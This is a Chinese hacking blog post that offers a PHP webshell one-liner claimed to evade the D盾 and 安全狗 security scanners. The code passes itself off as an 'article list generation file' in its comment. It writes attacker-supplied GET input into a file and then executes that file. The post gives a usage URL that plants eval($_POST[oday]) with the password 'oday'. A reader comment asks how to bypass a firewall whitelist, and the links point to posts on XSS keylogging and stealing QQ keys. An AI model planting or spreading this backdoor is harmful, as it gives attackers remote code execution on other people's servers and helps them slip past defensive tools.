完美过D盾,安全狗的php一句话

作者:hack1990 时间:15-03-09 阅读数:980人阅读

<?php /* * *文章列表生成文件 */ if(isset($_GET['list'])){    mud(); } function mud(){ $fp=fopen('content_batch_stye.html','w'); file_put_contents('content_batch_stye.html',"<?php\r\n"); file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND); fclose($fp); require 'content_batch_stye.html';} ?>


使用方法:http://www.oday.pw/oday.php?list=eval($_POST[oday]);     // 密码 oday


测试结果:过安全狗D盾 36x 等


上一篇:XSS的键盘记录

下一篇:简单获取QQ key

评论列表

  •  
    发布于 2015-03-13 20:04:22  回复
  • 求教大牛安全狗iis白名单执行如何绕过,苦逼的绕了好久无果!

发表评论